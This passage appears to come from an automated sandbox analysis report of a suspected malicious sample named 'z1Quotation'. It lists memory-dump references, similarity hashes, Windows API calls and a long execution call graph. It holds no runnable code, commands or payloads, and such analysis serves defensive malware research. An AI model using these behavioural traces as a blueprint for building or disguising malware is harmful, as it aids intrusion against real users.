                                                                                                                  • Associated: 00000000.00000002.33522587751.000000006D436000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3394109436-0
                                                                                                                  • Opcode ID: 7509312de0156994eb7b08029e090912e1dbfe004d08ec2d5f2a81231d0cb9d7
                                                                                                                  • Instruction ID: e62d2bbd2df450d010047a4c84a5bcd73a6e3e8d26f937b8ee4d8089fa3ab2c0
                                                                                                                  • Opcode Fuzzy Hash: 7509312de0156994eb7b08029e090912e1dbfe004d08ec2d5f2a81231d0cb9d7
                                                                                                                  • Instruction Fuzzy Hash: F251A7B95082269FEB21DF6EC984F7A7BB8FB0E344B160419E545EB214D732EC04CB91
                                                                                                                  Function 00405E96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA6
                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405EBE
                                                                                                                  • CharNextA.USER32(00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ECF
                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004060F1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ED8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 190613189-0
                                                                                                                  • Opcode ID: 5cac60a44e2266709049edbfd25ede4b753d9409f8219a4c9632319a7255b88a
                                                                                                                  • Instruction ID: 056becee3127bc393857b1725e69ced0ab5272e19a56b367739326794dea16a5
                                                                                                                  • Opcode Fuzzy Hash: 5cac60a44e2266709049edbfd25ede4b753d9409f8219a4c9632319a7255b88a
                                                                                                                  • Instruction Fuzzy Hash: 5BF0C232104418EFD702DBA5CD0099FBBA8EF05254B2140AAE980F7211D634EF01ABA9

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:6.6%
                                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                  Signature Coverage:3.2%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:79
                                                                                                                  execution_graph 37632 44dea5 37633 44deb5 FreeLibrary 37632->37633 37634 44dec3 37632->37634 37633->37634 39986 4147f3 39989 414561 39986->39989 39988 414813 39990 41456d 39989->39990 39991 41457f GetPrivateProfileIntW 39989->39991 39994 4143f1 memset _itow WritePrivateProfileStringW 39990->39994 39991->39988 39993 41457a 39993->39988 39994->39993 37635 4287c1 37636 4287d2 37635->37636 37639 429ac1 37635->37639 37640 428818 37636->37640 37641 42881f 37636->37641 37651 425711 37636->37651 37637 4259da 37698 416760 11 API calls 37637->37698 37650 425ad6 37639->37650 37705 415c56 11 API calls 37639->37705 37672 42013a 37640->37672 37700 420244 97 API calls 37641->37700 37643 4260dd 37699 424251 120 API calls 37643->37699 37646 4259c2 37646->37650 37692 415c56 11 API calls 37646->37692 37651->37637 37651->37639 37651->37646 37654 422aeb memset memcpy memcpy 37651->37654 37655 429a4d 37651->37655 37661 4260a1 37651->37661 37671 425a38 37651->37671 37688 4227f0 memset memcpy 37651->37688 37689 422b84 15 API calls 37651->37689 37690 422b5d memset memcpy memcpy 37651->37690 37691 422640 13 API calls 37651->37691 37693 4241fc 11 API calls 37651->37693 37694 42413a 90 API calls 37651->37694 37654->37651 37656 429a66 37655->37656 37657 429a9b 37655->37657 37701 415c56 11 API calls 37656->37701 37660 429a96 37657->37660 37703 416760 11 API calls 37657->37703 37704 424251 120 API calls 37660->37704 37697 415c56 11 API calls 37661->37697 37663 429a7a 37702 416760 11 API calls 37663->37702 37671->37646 37695 422640 13 API calls 37671->37695 37696 4226e0 12 API calls 37671->37696 37673 42014c 37672->37673 37676 420151 37672->37676 37715 41e466 97 API calls 37673->37715 37675 420162 37675->37651 37676->37675 37677 4201b3 37676->37677 37678 420229 37676->37678 37679 4201b8 37677->37679 37680 4201dc 37677->37680 37678->37675 37681 41fd5e 86 API calls 37678->37681 37706 41fbdb 37679->37706 37680->37675 37684 4201ff 37680->37684 37712 41fc4c 37680->37712 37681->37675 37684->37675 37687 42013a 97 API calls 37684->37687 37687->37675 37688->37651 37689->37651 37690->37651 37691->37651 37692->37637 37693->37651 37694->37651 37695->37671 37696->37671 37697->37637 37698->37643 37699->37650 37700->37651 37701->37663 37702->37660 37703->37660 37704->37639 37705->37637 37707 41fbf1 37706->37707 37708 41fbf8 37706->37708 37711 41fc39 37707->37711 37730 4446ce 11 API calls 37707->37730 37720 41ee26 37708->37720 37711->37675 37716 41fd5e 37711->37716 37713 41ee6b 86 API calls 37712->37713 37714 41fc5d 37713->37714 37714->37680 37715->37676 37719 41fd65 37716->37719 37717 41fdab 37717->37675 37718 41fbdb 86 API calls 37718->37719 37719->37717 37719->37718 37721 41ee41 37720->37721 37722 41ee32 37720->37722 37731 41edad 37721->37731 37734 4446ce 11 API calls 37722->37734 37726 41ee3c 37726->37707 37728 41ee58 37728->37726 37736 41ee6b 37728->37736 37730->37711 37740 41be52 37731->37740 37734->37726 37735 41eb85 11 API calls 37735->37728 37737 41ee70 37736->37737 37738 41ee78 37736->37738 37793 41bf99 86 API calls 37737->37793 37738->37726 37741 41be6f 37740->37741 37742 41be5f 37740->37742 37747 41be8c 37741->37747 37772 418c63 memset memset 37741->37772 37771 4446ce 11 API calls 37742->37771 37744 41be69 37744->37726 37744->37735 37747->37744 37748 41bf3a 37747->37748 37750 41bed1 37747->37750 37751 41bee7 37747->37751 37775 4446ce 11 API calls 37748->37775 37752 41bef0 37750->37752 37754 41bee2 37750->37754 37751->37744 37776 41a453 86 API calls 37751->37776 37752->37751 37753 41bf01 37752->37753 37755 41bf24 memset 37753->37755 37757 41bf14 37753->37757 37773 418a6d memset memcpy memset 37753->37773 37761 41ac13 37754->37761 37755->37744 37774 41a223 memset memcpy memset 37757->37774 37760 41bf20 37760->37755 37762 41ac3f memset 37761->37762 37763 41ac52 37761->37763 37768 41acd9 37762->37768 37765 41ac6a 37763->37765 37777 41dc14 19 API calls 37763->37777 37766 41aca1 37765->37766 37778 41519d 37765->37778 37766->37768 37769 41acc0 memset 37766->37769 37770 41accd memcpy 37766->37770 37768->37751 37769->37768 37770->37768 37771->37744 37772->37747 37773->37757 37774->37760 37775->37751 37777->37765 37781 4175ed 37778->37781 37789 417570 SetFilePointer 37781->37789 37784 41760a ReadFile 37785 417637 37784->37785 37786 417627 GetLastError 37784->37786 37787 4151b3 37785->37787 37788 41763e memset 37785->37788 37786->37787 37787->37766 37788->37787 37790 4175b2 37789->37790 37791 41759c GetLastError 37789->37791 37790->37784 37790->37787 37791->37790 37792 4175a8 GetLastError 37791->37792 37792->37790 37793->37738 39995 44def7 39996 44df07 39995->39996 39997 44df00 ??3@YAXPAX 39995->39997 39998 44df17 39996->39998 39999 44df10 ??3@YAXPAX 39996->39999 39997->39996 40000 44df27 39998->40000 40001 44df20 ??3@YAXPAX 39998->40001 39999->39998 40002 44df37 40000->40002 40003 44df30 ??3@YAXPAX 40000->40003 40001->40000 40003->40002 37794 417bc5 37795 417c61 37794->37795 37796 417bda 37794->37796 37796->37795 37797 417bf6 UnmapViewOfFile CloseHandle 37796->37797 37799 417c2c 37796->37799 37801 4175b7 37796->37801 37797->37796 37797->37797 37799->37796 37806 41851e 20 API calls 37799->37806 37802 4175d6 CloseHandle 37801->37802 37803 4175c8 37802->37803 37804 4175df 37802->37804 37803->37804 37805 4175ce Sleep 37803->37805 37804->37796 37805->37802 37806->37799 37807 4152c7 malloc 37808 4152ef 37807->37808 37810 4152e2 37807->37810 37811 416760 11 API calls 37808->37811 37811->37810 40004 4148b6 FindResourceW 40005 4148cf SizeofResource 40004->40005 40008 4148f9 40004->40008 40006 4148e0 LoadResource 40005->40006 40005->40008 40007 4148ee LockResource 40006->40007 40006->40008 40007->40008 37812 4232e8 37813 4232ef 37812->37813 37816 415b2c 37813->37816 37815 423305 37817 415b42 37816->37817 37820 415b46 37816->37820 37818 415b94 37817->37818 37817->37820 37821 415b5a 37817->37821 37823 4438b5 37818->37823 37820->37815 37821->37820 37822 415b79 memcpy 37821->37822 37822->37820 37824 4438d0 37823->37824 37834 4438c9 37823->37834 37837 415378 memcpy memcpy 37824->37837 37834->37820 40009 441b3f 40019 43a9f6 40009->40019 40011 441b61 40192 4386af memset 40011->40192 40013 44189a 40014 442bd4 40013->40014 40015 4418e2 40013->40015 40016 4418ea 40014->40016 40194 441409 memset 40014->40194 40015->40016 40193 4414a9 12 API calls 40015->40193 40020 43aa20 40019->40020 40021 43aadf 40019->40021 40020->40021 40022 43aa34 memset 40020->40022 40021->40011 40023 43aa56 40022->40023 40024 43aa4d 40022->40024 40195 43a6e7 40023->40195 40203 42c02e memset 40024->40203 40029 43aad3 40205 4169a7 11 API calls 40029->40205 40030 43aaae 40030->40021 40030->40029 40045 43aae5 40030->40045 40032 43ac18 40034 43ac47 40032->40034 40207 42bbd5 memcpy memcpy memcpy memset memcpy 40032->40207 40035 43aca8 40034->40035 40208 438eed 16 API calls 40034->40208 40039 43acd5 40035->40039 40210 4233ae 11 API calls 40035->40210 40038 43ac87 40209 4233c5 16 API calls 40038->40209 40211 423426 11 API calls 40039->40211 40043 43ace1 40212 439811 164 API calls 40043->40212 40044 43a9f6 162 API calls 40044->40045 40045->40021 40045->40032 40045->40044 40206 439bbb 22 API calls 40045->40206 40047 43acfd 40053 43ad2c 40047->40053 40213 438eed 16 API calls 40047->40213 40049 43ad19 40214 4233c5 16 API calls 40049->40214 40051 43ad58 40215 44081d 164 API calls 40051->40215 40053->40051 40055 43add9 40053->40055 40055->40055 40219 423426 11 API calls 40055->40219 40056 43ae3a memset 40057 43ae73 40056->40057 40220 42e1c0 148 API calls 40057->40220 40058 43adab 40217 438c4e 164 API calls 40058->40217 40060 43ad6c 40060->40021 40060->40058 40216 42370b memset memcpy memset 40060->40216 40062 43ae96 40221 42e1c0 148 API calls 40062->40221 40064 43adcc 40218 440f84 12 API calls 40064->40218 40067 43aea8 40068 43aec1 40067->40068 40222 42e199 148 API calls 40067->40222 40070 43af00 40068->40070 40223 42e1c0 148 API calls 40068->40223 40070->40021 40073 43af1a 40070->40073 40074 43b3d9 40070->40074 40224 438eed 16 API calls 40073->40224 40079 43b3f6 40074->40079 40086 43b4c8 40074->40086 40076 43b60f 40076->40021 40283 4393a5 17 API calls 40076->40283 40077 43af2f 40225 4233c5 16 API calls 40077->40225 40265 432878 12 API calls 40079->40265 40081 43af51 40226 423426 11 API calls 40081->40226 40084 43af7d 40227 423426 11 API calls 40084->40227 40085 43b4f2 40272 43a76c 21 API calls 40085->40272 40086->40085 40271 42bbd5 memcpy memcpy memcpy memset memcpy 40086->40271 40090 43b529 40273 44081d 164 API calls 40090->40273 40091 43b428 40119 43b462 40091->40119 40266 432b60 16 API calls 40091->40266 40092 43af94 40228 423330 11 API calls 40092->40228 40096 43b47e 40105 43b497 40096->40105 40268 42374a memcpy memset memcpy memcpy memcpy 40096->40268 40097 43b544 40107 43b55c 40097->40107 40274 42c02e memset 40097->40274 40098 43afca 40229 423330 11 API calls 40098->40229 40103 43afdb 40230 4233ae 11 API calls 40103->40230 40269 4233ae 11 API calls 40105->40269 40106 43b4b1 40270 423399 11 API calls 40106->40270 40275 43a87a 164 API calls 40107->40275 40109 43b56c 40112 43b58a 40109->40112 40276 423330 11 API calls 40109->40276 40111 43afee 40231 44081d 164 API calls 40111->40231 40277 440f84 12 API calls 40112->40277 40114 43b4c1 40279 42db80 164 API calls 40114->40279 40118 43b592 40278 43a82f 16 API calls 40118->40278 40267 423330 11 API calls 40119->40267 40122 43b5b4 40280 438c4e 164 API calls 40122->40280 40124 43b5cf 40281 42c02e memset 40124->40281 40126 43b005 40126->40021 40131 43b01f 40126->40131 40232 42d836 164 API calls 40126->40232 40127 43b1ef 40242 4233c5 16 API calls 40127->40242 40129 43b212 40243 423330 11 API calls 40129->40243 40131->40127 40240 423330 11 API calls 40131->40240 40241 42d71d 164 API calls 40131->40241 40133 43add4 40133->40076 40282 438f86 16 API calls 40133->40282 40136 43b087 40233 4233ae 11 API calls 40136->40233 40137 43b22a 40244 42ccb5 11 API calls 40137->40244 40140 43b10f 40236 423330 11 API calls 40140->40236 40141 43b23f 40245 4233ae 11 API calls 40141->40245 40143 43b257 40246 4233ae 11 API calls 40143->40246 40147 43b129 40237 4233ae 11 API calls 40147->40237 40148 43b26e 40247 4233ae 11 API calls 40148->40247 40150 43b09a 40150->40140 40234 42cc15 19 API calls 40150->40234 40235 4233ae 11 API calls 40150->40235 40152 43b282 40248 43a87a 164 API calls 40152->40248 40154 43b13c 40238 440f84 12 API calls 40154->40238 40156 43b29d 40249 423330 11 API calls 40156->40249 40159 43b15f 40239 4233ae 11 API calls 40159->40239 40160 43b2af 40162 43b2b8 40160->40162 40163 43b2ce 40160->40163 40250 4233ae 11 API calls 40162->40250 40251 440f84 12 API calls 40163->40251 40166 43b2c9 40253 4233ae 11 API calls 40166->40253 40167 43b2da 40252 42370b memset memcpy memset 40167->40252 40170 43b2f9 40254 423330 11 API calls 40170->40254 40172 43b30b 40255 423330 11 API calls 40172->40255 40174 43b325 40256 423399 11 API calls 40174->40256 40176 43b332 40257 4233ae 11 API calls 40176->40257 40178 43b354 40258 423399 11 API calls 40178->40258 40180 43b364 40259 43a82f 16 API calls 40180->40259 40182 43b370 40260 42db80 164 API calls 40182->40260 40184 43b380 40261 438c4e 164 API calls 40184->40261 40186 43b39e 40262 423399 11 API calls 40186->40262 40188 43b3ae 40263 43a76c 21 API calls 40188->40263 40190 43b3c3 40264 423399 11 API calls 40190->40264 40192->40013 40193->40016 40194->40014 40196 43a6f5 40195->40196 40197 43a765 40195->40197 40196->40197 40284 42a115 40196->40284 40197->40021 40204 4397fd memset 40197->40204 40201 43a73d 40201->40197 40202 42a115 148 API calls 40201->40202 40202->40197 40203->40023 40204->40030 40205->40021 40206->40045 40207->40034 40208->40038 40209->40035 40210->40039 40211->40043 40212->40047 40213->40049 40214->40053 40215->40060 40216->40058 40217->40064 40218->40133 40219->40056 40220->40062 40221->40067 40222->40068 40223->40068 40224->40077 40225->40081 40226->40084 40227->40092 40228->40098 40229->40103 40230->40111 40231->40126 40232->40136 40233->40150 40234->40150 40235->40150 40236->40147 40237->40154 40238->40159 40239->40131 40240->40131 40241->40131 40242->40129 40243->40137 40244->40141 40245->40143 40246->40148 40247->40152 40248->40156 40249->40160 40250->40166 40251->40167 40252->40166 40253->40170 40254->40172 40255->40174 40256->40176 40257->40178 40258->40180 40259->40182 40260->40184 40261->40186 40262->40188 40263->40190 40264->40133 40265->40091 40266->40119 40267->40096 40268->40105 40269->40106 40270->40114 40271->40085 40272->40090 40273->40097 40274->40107 40275->40109 40276->40112 40277->40118 40278->40114 40279->40122 40280->40124 40281->40133 40282->40076 40283->40021 40285 42a175 40284->40285 40287 42a122 40284->40287 40285->40197 40290 42b13b 148 API calls 40285->40290 40287->40285 40288 42a115 148 API calls 40287->40288 40291 43a174 40287->40291 40315 42a0a8 148 API calls 40287->40315 40288->40287 40290->40201 40305 43a196 40291->40305 40306 43a19e 40291->40306 40292 43a306 40292->40305 40331 4388c4 14 API calls 40292->40331 40295 42a115 148 API calls 40295->40306 40296 415a91 memset 40296->40306 40297 43a642 40297->40305 40335 4169a7 11 API calls 40297->40335 40301 43a635 40334 42c02e memset 40301->40334 40305->40287 40306->40292 40306->40295 40306->40296 40306->40305 40316 42ff8c 40306->40316 40324 4165ff 40306->40324 40327 439504 13 API calls 40306->40327 40328 4312d0 148 API calls 40306->40328 40329 42be4c memcpy memcpy memcpy memset memcpy 40306->40329 40330 43a121 11 API calls 40306->40330 40308 43a325 40308->40297 40308->40301 40308->40305 40309 4169a7 11 API calls 40308->40309 40310 42b5b5 memset memcpy 40308->40310 40311 42bf4c 14 API calls 40308->40311 40314 4165ff 11 API calls 40308->40314 40332 42b63e 14 API calls 40308->40332 40333 42bfcf memcpy 40308->40333 40309->40308 40310->40308 40311->40308 40314->40308 40315->40287 40336 43817e 40316->40336 40318 42ff99 40319 42ffe3 40318->40319 40320 42ffd0 40318->40320 40323 42ff9d 40318->40323 40341 4169a7 11 API calls 40319->40341 40340 4169a7 11 API calls 40320->40340 40323->40306 40325 4165a0 11 API calls 40324->40325 40326 41660d 40325->40326 40326->40306 40327->40306 40328->40306 40329->40306 40330->40306 40331->40308 40332->40308 40333->40308 40334->40297 40335->40305 40337 438187 40336->40337 40339 438192 40336->40339 40342 4380f6 40337->40342 40339->40318 40340->40323 40341->40323 40344 43811f 40342->40344 40343 438164 40343->40339 40344->40343 40346 4300e8 3 API calls 40344->40346 40347 437e5e 40344->40347 40346->40344 40370 437d3c 40347->40370 40349 437eb3 40349->40344 40350 437ea9 40350->40349 40355 437f22 40350->40355 40385 41f432 40350->40385 40353 437f06 40433 415c56 11 API calls 40353->40433 40357 437f7f 40355->40357 40358 432d4e 3 API calls 40355->40358 40356 437f95 40434 415c56 11 API calls 40356->40434 40357->40356 40360 43802b 40357->40360 40358->40357 40361 4165ff 11 API calls 40360->40361 40362 438054 40361->40362 40396 437371 40362->40396 40365 43806b 40366 438094 40365->40366 40435 42f50e 139 API calls 40365->40435 40368 437fa3 40366->40368 40369 4300e8 3 API calls 40366->40369 40368->40349 40436 41f638 104 API calls 40368->40436 40369->40368 40371 437d69 40370->40371 40374 437d80 40370->40374 40437 437ccb 11 API calls 40371->40437 40373 437d76 40373->40350 40374->40373 40375 437da3 40374->40375 40376 437d90 40374->40376 40378 438460 134 API calls 40375->40378 40376->40373 40441 437ccb 11 API calls 40376->40441 40381 437dcb 40378->40381 40380 437de8 40440 424f26 123 API calls 40380->40440 40381->40380 40438 444283 13 API calls 40381->40438 40383 437dfc 40439 437ccb 11 API calls 40383->40439 40386 41f54d 40385->40386 40392 41f44f 40385->40392 40387 41f466 40386->40387 40471 41c635 memset memset 40386->40471 40387->40353 40387->40355 40392->40387 40394 41f50b 40392->40394 40442 41f1a5 40392->40442 40467 41c06f memcmp 40392->40467 40468 41f3b1 90 API calls 40392->40468 40469 41f398 86 API calls 40392->40469 40394->40386 40394->40387 40470 41c295 86 API calls 40394->40470 40397 41703f 11 API calls 40396->40397 40398 437399 40397->40398 40399 43739d 40398->40399 40402 4373ac 40398->40402 40473 4446ea 11 API calls 40399->40473 40401 4373a7 40401->40365 40403 416935 16 API calls 40402->40403 40404 4373ca 40403->40404 40406 438460 134 API calls 40404->40406 40410 4251c4 137 API calls 40404->40410 40414 415a91 memset 40404->40414 40417 43758f 40404->40417 40429 437584 40404->40429 40432 437d3c 135 API calls 40404->40432 40472 415308 free 40404->40472 40474 425433 13 API calls 40404->40474 40475 425413 17 API calls 40404->40475 40476 42533e 16 API calls 40404->40476 40477 42538f 16 API calls 40404->40477 40478 42453e 123 API calls 40404->40478 40405 4375bc 40408 415c7d 16 API calls 40405->40408 40406->40404 40409 4375d2 40408->40409 40409->40401 40411 4442e6 11 API calls 40409->40411 40410->40404 40412 4375e2 40411->40412 40412->40401 40481 444283 13 API calls 40412->40481 40414->40404 40479 42453e 123 API calls 40417->40479 40418 4375f4 40423 437620 40418->40423 40424 43760b 40418->40424 40422 43759f 40425 416935 16 API calls 40422->40425 40427 416935 16 API calls 40423->40427 40482 444283 13 API calls 40424->40482 40425->40429 40427->40401 40429->40405 40480 42453e 123 API calls 40429->40480 40430 437612 memcpy 40430->40401 40432->40404 40433->40349 40434->40368 40435->40366 40436->40349 40437->40373 40438->40383 40439->40380 40440->40373 40441->40373 40443 41bc3b 101 API calls 40442->40443 40444 41f1b4 40443->40444 40445 41edad 86 API calls 40444->40445 40452 41f282 40444->40452 40446 41f1cb 40445->40446 40447 41f1f5 memcmp 40446->40447 40448 41f20e 40446->40448 40446->40452 40447->40448 40449 41f21b memcmp 40448->40449 40448->40452 40450 41f326 40449->40450 40453 41f23d 40449->40453 40451 41ee6b 86 API calls 40450->40451 40450->40452 40451->40452 40452->40392 40453->40450 40454 41f28e memcmp 40453->40454 40456 41c8df 56 API calls 40453->40456 40454->40450 40455 41f2a9 40454->40455 40455->40450 40458 41f308 40455->40458 40459 41f2d8 40455->40459 40457 41f269 40456->40457 40457->40450 40460 41f287 40457->40460 40461 41f27a 40457->40461 40458->40450 40465 4446ce 11 API calls 40458->40465 40462 41ee6b 86 API calls 40459->40462 40460->40454 40463 41ee6b 86 API calls 40461->40463 40464 41f2e0 40462->40464 40463->40452 40466 41b1ca memset 40464->40466 40465->40450 40466->40452 40467->40392 40468->40392 40469->40392 40470->40386 40471->40387 40472->40404 40473->40401 40474->40404 40475->40404 40476->40404 40477->40404 40478->40404 40479->40422 40480->40405 40481->40418 40482->40430 37838 41276d 37839 41277d 37838->37839 37881 4044a4 LoadLibraryW 37839->37881 37841 412785 37842 412789 37841->37842 37889 414b81 37841->37889 37845 4127c8 37895 412465 memset ??2@YAPAXI 37845->37895 37847 4127ea 37907 40ac21 37847->37907 37852 412813 37925 40dd07 memset 37852->37925 37853 412827 37930 40db69 memset 37853->37930 37856 412822 37951 4125b6 ??3@YAXPAX 37856->37951 37858 40ada2 _wcsicmp 37860 41283d 37858->37860 37860->37856 37863 412863 CoInitialize 37860->37863 37935 41268e 37860->37935 37955 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37863->37955 37866 41296f 37957 40b633 37866->37957 37868 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37873 412957 CoUninitialize 37868->37873 37878 4128ca 37868->37878 37873->37856 37874 4128d0 TranslateAcceleratorW 37875 412941 GetMessageW 37874->37875 37874->37878 37875->37873 37875->37874 37876 412909 IsDialogMessageW 37876->37875 37876->37878 37877 4128fd IsDialogMessageW 37877->37875 37877->37876 37878->37874 37878->37876 37878->37877 37879 41292b TranslateMessage DispatchMessageW 37878->37879 37880 41291f IsDialogMessageW 37878->37880 37879->37875 37880->37875 37880->37879 37882 4044f7 37881->37882 37883 4044cf GetProcAddress 37881->37883 37887 404507 MessageBoxW 37882->37887 37888 40451e 37882->37888 37884 4044e8 FreeLibrary 37883->37884 37885 4044df 37883->37885 37884->37882 37886 4044f3 37884->37886 37885->37884 37886->37882 37887->37841 37888->37841 37890 414b8a 37889->37890 37891 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37889->37891 37961 40a804 memset 37890->37961 37891->37845 37894 414b9e GetProcAddress 37894->37891 37896 4124e0 37895->37896 37897 412505 ??2@YAPAXI 37896->37897 37898 412521 37897->37898 37899 41251c 37897->37899 37972 444722 37898->37972 37983 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37899->37983 37906 41259b wcscpy 37906->37847 37988 40b1ab free free 37907->37988 37909 40ad76 37989 40aa04 37909->37989 37912 40a9ce malloc memcpy free free 37915 40ac5c 37912->37915 37913 40ad4b 37913->37909 38012 40a9ce 37913->38012 37915->37909 37915->37912 37915->37913 37916 40ace7 free 37915->37916 37992 40a8d0 37915->37992 38004 4099f4 37915->38004 37916->37915 37920 40a8d0 7 API calls 37920->37909 37921 40ada2 37922 40adc9 37921->37922 37923 40adaa 37921->37923 37922->37852 37922->37853 37923->37922 37924 40adb3 _wcsicmp 37923->37924 37924->37922 37924->37923 38017 40dce0 37925->38017 37927 40dd3a GetModuleHandleW 38022 40dba7 37927->38022 37931 40dce0 3 API calls 37930->37931 37932 40db99 37931->37932 38094 40dae1 37932->38094 38108 402f3a 37935->38108 37937 412766 37937->37856 37937->37863 37938 4126d3 _wcsicmp 37939 4126a8 37938->37939 37939->37937 37939->37938 37941 41270a 37939->37941 38143 4125f8 7 API calls 37939->38143 37941->37937 38111 411ac5 37941->38111 37952 4125da 37951->37952 37953 4125f0 37952->37953 37954 4125e6 DeleteObject 37952->37954 37956 40b1ab free free 37953->37956 37954->37953 37955->37868 37956->37866 37958 40b640 37957->37958 37959 40b639 free 37957->37959 37960 40b1ab free free 37958->37960 37959->37958 37960->37842 37962 40a83b GetSystemDirectoryW 37961->37962 37963 40a84c wcscpy 37961->37963 37962->37963 37968 409719 wcslen 37963->37968 37966 40a881 LoadLibraryW 37967 40a886 37966->37967 37967->37891 37967->37894 37969 409724 37968->37969 37970 409739 wcscat LoadLibraryW 37968->37970 37969->37970 37971 40972c wcscat 37969->37971 37970->37966 37970->37967 37971->37970 37973 444732 37972->37973 37974 444728 DeleteObject 37972->37974 37984 409cc3 37973->37984 37974->37973 37976 412551 37977 4010f9 37976->37977 37978 401130 37977->37978 37979 401134 GetModuleHandleW LoadIconW 37978->37979 37980 401107 wcsncat 37978->37980 37981 40a7be 37979->37981 37980->37978 37982 40a7d2 37981->37982 37982->37906 37982->37982 37983->37898 37987 409bfd memset wcscpy 37984->37987 37986 409cdb CreateFontIndirectW 37986->37976 37987->37986 37988->37915 37990 40aa14 37989->37990 37991 40aa0a free 37989->37991 37990->37921 37991->37990 37993 40a8eb 37992->37993 37994 40a8df wcslen 37992->37994 37995 40a906 free 37993->37995 37996 40a90f 37993->37996 37994->37993 37997 40a919 37995->37997 37998 4099f4 3 API calls 37996->37998 37999 40a932 37997->37999 38000 40a929 free 37997->38000 37998->37997 38002 4099f4 3 API calls 37999->38002 38001 40a93e memcpy 38000->38001 38001->37915 38003 40a93d 38002->38003 38003->38001 38005 409a41 38004->38005 38006 4099fb malloc 38004->38006 38005->37915 38008 409a37 38006->38008 38009 409a1c 38006->38009 38008->37915 38010 409a30 free 38009->38010 38011 409a20 memcpy 38009->38011 38010->38008 38011->38010 38013 40a9e7 38012->38013 38014 40a9dc free 38012->38014 38015 4099f4 3 API calls 38013->38015 38016 40a9f2 38014->38016 38015->38016 38016->37920 38041 409bca GetModuleFileNameW 38017->38041 38019 40dce6 wcsrchr 38020 40dcf5 38019->38020 38021 40dcf9 wcscat 38019->38021 38020->38021 38021->37927 38042 44db70 38022->38042 38024 40dbb4 memset memset 38044 409bca GetModuleFileNameW 38024->38044 38026 40dbfd 38045 4447d9 38026->38045 38029 40dc34 wcscpy wcscpy 38071 40d6f5 38029->38071 38030 40dc1f wcscpy 38030->38029 38033 40d6f5 3 API calls 38034 40dc73 38033->38034 38035 40d6f5 3 API calls 38034->38035 38036 40dc89 38035->38036 38037 40d6f5 3 API calls 38036->38037 38038 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38037->38038 38077 40da80 38038->38077 38041->38019 38043 44db77 38042->38043 38043->38024 38043->38043 38044->38026 38047 4447f4 38045->38047 38046 40dc1b 38046->38029 38046->38030 38047->38046 38048 444807 ??2@YAPAXI 38047->38048 38049 44481f 38048->38049 38050 444873 _snwprintf 38049->38050 38051 4448ab wcscpy 38049->38051 38084 44474a 8 API calls 38050->38084 38053 4448bb 38051->38053 38085 44474a 8 API calls 38053->38085 38054 4448a7 38054->38051 38054->38053 38056 4448cd 38086 44474a 8 API calls 38056->38086 38058 4448e2 38087 44474a 8 API calls 38058->38087 38060 4448f7 38088 44474a 8 API calls 38060->38088 38062 44490c 38089 44474a 8 API calls 38062->38089 38064 444921 38090 44474a 8 API calls 38064->38090 38066 444936 38091 44474a 8 API calls 38066->38091 38068 44494b 38092 44474a 8 API calls 38068->38092 38070 444960 ??3@YAXPAX 38070->38046 38072 44db70 38071->38072 38073 40d702 memset GetPrivateProfileStringW 38072->38073 38074 40d752 38073->38074 38075 40d75c WritePrivateProfileStringW 38073->38075 38074->38075 38076 40d758 38074->38076 38075->38076 38076->38033 38078 44db70 38077->38078 38079 40da8d memset 38078->38079 38080 40daac LoadStringW 38079->38080 38083 40dac6 38080->38083 38082 40dade 38082->37856 38083->38080 38083->38082 38093 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38083->38093 38084->38054 38085->38056 38086->38058 38087->38060 38088->38062 38089->38064 38090->38066 38091->38068 38092->38070 38093->38083 38104 409b98 GetFileAttributesW 38094->38104 38096 40daea 38097 40daef wcscpy wcscpy GetPrivateProfileIntW 38096->38097 38103 40db63 38096->38103 38105 40d65d 